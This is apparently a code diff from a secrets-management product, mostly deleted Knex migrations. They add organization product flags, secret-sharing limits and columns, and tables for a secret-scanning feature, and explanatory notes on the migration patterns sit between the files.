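  encrypt: (plainText: Buffer) => Buffer;
};
export function addGatewayIdToEncryptedInput(encryptedInput: Buffer, gatewayId: string, cipher: Cipher): Buffer {
  const input = JSON.parse(cipher.decrypt(encryptedInput).toString()) as Record<string, unknown>;
  // the old projectGatewayId is intentionally kept so a rollback needs no re-encryption
  const updated = { ...input, gatewayId };
  return cipher.encrypt(Buffer.from(JSON.stringify(updated)));
}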

View File

@@ -1,53 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const columns = await knex.table(TableName.Organization).columnInfo();
await knex.schema.alterTable(TableName.Organization, (t) => {
if (!columns.secretsProductEnabled) {
t.boolean("secretsProductEnabled").defaultTo(true);
}
if (!columns.pkiProductEnabled) {
t.boolean("pkiProductEnabled").defaultTo(true);
}
if (!columns.kmsProductEnabled) {
t.boolean("kmsProductEnabled").defaultTo(true);
}
if (!columns.sshProductEnabled) {
t.boolean("sshProductEnabled").defaultTo(true);
}
if (!columns.scannerProductEnabled) {
t.boolean("scannerProductEnabled").defaultTo(true);
}
if (!columns.shareSecretsProductEnabled) {
t.boolean("shareSecretsProductEnabled").defaultTo(true);
}
});
}
export async function down(knex: Knex): Promise<void> {
const columns = await knex.table(TableName.Organization).columnInfo();
await knex.schema.alterTable(TableName.Organization, (t) => {
if (columns.secretsProductEnabled) {
t.dropColumn("secretsProductEnabled");
}
if (columns.pkiProductEnabled) {
t.dropColumn("pkiProductEnabled");
}
if (columns.kmsProductEnabled) {
t.dropColumn("kmsProductEnabled");
}
if (columns.sshProductEnabled) {
t.dropColumn("sshProductEnabled");
}
if (columns.scannerProductEnabled) {
t.dropColumn("scannerProductEnabled");
}
if (columns.shareSecretsProductEnabled) {
t.dropColumn("shareSecretsProductEnabled");
}
});
}
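
Unlike the hasColumn checks used elsewhere in these migrations, this one reads knex's columnInfo() once and tests each key for truthiness. A short hedged sketch of that pattern follows; the connection string, table name, and column name are placeholders.

// Hedged sketch: columnInfo() resolves to a map of column name -> metadata, so a
// truthiness check on a key is enough to detect whether the column already exists.
// Table/column names and the connection string below are placeholders.
import knexFactory from "knex";

export async function columnExists(): Promise<boolean> {
  const db = knexFactory({ client: "pg", connection: process.env.DB_CONNECTION_URI });
  try {
    const columns = await db.table("organizations").columnInfo();
    // e.g. { secretsProductEnabled: { type: "boolean", nullable: true, ... }, ... }
    return Boolean(columns.secretsProductEnabled);
  } finally {
    await db.destroy();
  }
}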

View File

@@ -1,21 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasSecretSharingColumn = await knex.schema.hasColumn(TableName.Project, "secretSharing");
if (!hasSecretSharingColumn) {
await knex.schema.table(TableName.Project, (table) => {
table.boolean("secretSharing").notNullable().defaultTo(true);
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasSecretSharingColumn = await knex.schema.hasColumn(TableName.Project, "secretSharing");
if (hasSecretSharingColumn) {
await knex.schema.table(TableName.Project, (table) => {
table.dropColumn("secretSharing");
});
}
}

View File

@@ -1,35 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
const hasLifetimeColumn = await knex.schema.hasColumn(TableName.Organization, "maxSharedSecretLifetime");
const hasViewLimitColumn = await knex.schema.hasColumn(TableName.Organization, "maxSharedSecretViewLimit");
if (!hasLifetimeColumn || !hasViewLimitColumn) {
await knex.schema.alterTable(TableName.Organization, (t) => {
if (!hasLifetimeColumn) {
t.integer("maxSharedSecretLifetime").nullable().defaultTo(2592000); // 30 days in seconds
}
if (!hasViewLimitColumn) {
t.integer("maxSharedSecretViewLimit").nullable();
}
});
}
}
export async function down(knex: Knex): Promise<void> {
const hasLifetimeColumn = await knex.schema.hasColumn(TableName.Organization, "maxSharedSecretLifetime");
const hasViewLimitColumn = await knex.schema.hasColumn(TableName.Organization, "maxSharedSecretViewLimit");
if (hasLifetimeColumn || hasViewLimitColumn) {
await knex.schema.alterTable(TableName.Organization, (t) => {
if (hasLifetimeColumn) {
t.dropColumn("maxSharedSecretLifetime");
}
if (hasViewLimitColumn) {
t.dropColumn("maxSharedSecretViewLimit");
}
});
}
}

View File

@@ -1,43 +0,0 @@
import { Knex } from "knex";
import { TableName } from "../schemas";
export async function up(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.SecretSharing)) {
const hasEncryptedSalt = await knex.schema.hasColumn(TableName.SecretSharing, "encryptedSalt");
const hasAuthorizedEmails = await knex.schema.hasColumn(TableName.SecretSharing, "authorizedEmails");
if (!hasEncryptedSalt || !hasAuthorizedEmails) {
await knex.schema.alterTable(TableName.SecretSharing, (t) => {
// These two columns are only needed when secrets are shared with a specific list of emails
if (!hasEncryptedSalt) {
t.binary("encryptedSalt").nullable();
}
if (!hasAuthorizedEmails) {
t.json("authorizedEmails").nullable();
}
});
}
}
}
export async function down(knex: Knex): Promise<void> {
if (await knex.schema.hasTable(TableName.SecretSharing)) {
const hasEncryptedSalt = await knex.schema.hasColumn(TableName.SecretSharing, "encryptedSalt");
const hasAuthorizedEmails = await knex.schema.hasColumn(TableName.SecretSharing, "authorizedEmails");
if (hasEncryptedSalt || hasAuthorizedEmails) {
await knex.schema.alterTable(TableName.SecretSharing, (t) => {
if (hasEncryptedSalt) {
t.dropColumn("encryptedSalt");
}
if (hasAuthorizedEmails) {
t.dropColumn("authorizedEmails");
}
});
}
}
}
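
The two columns added above only matter for email-restricted shares. The shapes below are assumptions based on the inline comment, shown purely for illustration.

// Assumed shapes for the new columns, based on the inline comment above:
// authorizedEmails is a JSON list of recipient addresses and encryptedSalt is an
// opaque ciphertext used only when a share is restricted to specific emails.
type EmailRestrictedShareFields = {
  authorizedEmails: string[] | null;
  encryptedSalt: Buffer | null;
};
export const exampleShareFields: EmailRestrictedShareFields = {
  authorizedEmails: ["dev@example.com", "ops@example.com"],
  encryptedSalt: null
};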

View File

@@ -1,107 +0,0 @@
import { Knex } from "knex";
import { TableName } from "@app/db/schemas";
import { createOnUpdateTrigger, dropOnUpdateTrigger } from "@app/db/utils";
import {
SecretScanningFindingStatus,
SecretScanningScanStatus
} from "@app/ee/services/secret-scanning-v2/secret-scanning-v2-enums";
export async function up(knex: Knex): Promise<void> {
if (!(await knex.schema.hasTable(TableName.SecretScanningDataSource))) {
await knex.schema.createTable(TableName.SecretScanningDataSource, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("externalId").index(); // if we need a unique way of identifying this data source from an external resource
t.string("name", 48).notNullable();
t.string("description");
t.string("type").notNullable();
t.jsonb("config").notNullable();
t.binary("encryptedCredentials"); // webhook credentials, etc.
t.uuid("connectionId");
t.boolean("isAutoScanEnabled").defaultTo(true);
t.foreign("connectionId").references("id").inTable(TableName.AppConnection);
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.timestamps(true, true, true);
t.boolean("isDisconnected").notNullable().defaultTo(false);
t.unique(["projectId", "name"]);
});
await createOnUpdateTrigger(knex, TableName.SecretScanningDataSource);
}
if (!(await knex.schema.hasTable(TableName.SecretScanningResource))) {
await knex.schema.createTable(TableName.SecretScanningResource, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("externalId").notNullable();
t.string("name").notNullable();
t.string("type").notNullable();
t.uuid("dataSourceId").notNullable();
t.foreign("dataSourceId").references("id").inTable(TableName.SecretScanningDataSource).onDelete("CASCADE");
t.timestamps(true, true, true);
t.unique(["dataSourceId", "externalId"]);
});
await createOnUpdateTrigger(knex, TableName.SecretScanningResource);
}
if (!(await knex.schema.hasTable(TableName.SecretScanningScan))) {
await knex.schema.createTable(TableName.SecretScanningScan, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("status").notNullable().defaultTo(SecretScanningScanStatus.Queued);
t.string("statusMessage", 1024);
t.string("type").notNullable();
t.uuid("resourceId").notNullable();
t.foreign("resourceId").references("id").inTable(TableName.SecretScanningResource).onDelete("CASCADE");
t.timestamp("createdAt").defaultTo(knex.fn.now());
});
}
if (!(await knex.schema.hasTable(TableName.SecretScanningFinding))) {
await knex.schema.createTable(TableName.SecretScanningFinding, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("dataSourceName").notNullable();
t.string("dataSourceType").notNullable();
t.string("resourceName").notNullable();
t.string("resourceType").notNullable();
t.string("rule").notNullable();
t.string("severity").notNullable();
t.string("status").notNullable().defaultTo(SecretScanningFindingStatus.Unresolved);
t.string("remarks");
t.string("fingerprint").notNullable();
t.jsonb("details").notNullable();
t.string("projectId").notNullable();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.uuid("scanId");
t.foreign("scanId").references("id").inTable(TableName.SecretScanningScan).onDelete("SET NULL");
t.timestamps(true, true, true);
t.unique(["projectId", "fingerprint"]);
});
await createOnUpdateTrigger(knex, TableName.SecretScanningFinding);
}
if (!(await knex.schema.hasTable(TableName.SecretScanningConfig))) {
await knex.schema.createTable(TableName.SecretScanningConfig, (t) => {
t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
t.string("projectId").notNullable().unique();
t.foreign("projectId").references("id").inTable(TableName.Project).onDelete("CASCADE");
t.string("content", 5000);
t.timestamps(true, true, true);
});
await createOnUpdateTrigger(knex, TableName.SecretScanningConfig);
}
}
export async function down(knex: Knex): Promise<void> {
await knex.schema.dropTableIfExists(TableName.SecretScanningFinding);
await dropOnUpdateTrigger(knex, TableName.SecretScanningFinding);
await knex.schema.dropTableIfExists(TableName.SecretScanningScan);
await knex.schema.dropTableIfExists(TableName.SecretScanningResource);
await dropOnUpdateTrigger(knex, TableName.SecretScanningResource);
await knex.schema.dropTableIfExists(TableName.SecretScanningDataSource);
await dropOnUpdateTrigger(knex, TableName.SecretScanningDataSource);
await knex.schema.dropTableIfExists(TableName.SecretScanningConfig);
await dropOnUpdateTrigger(knex, TableName.SecretScanningConfig);
}

Some files were not shown because too many files have changed in this diff.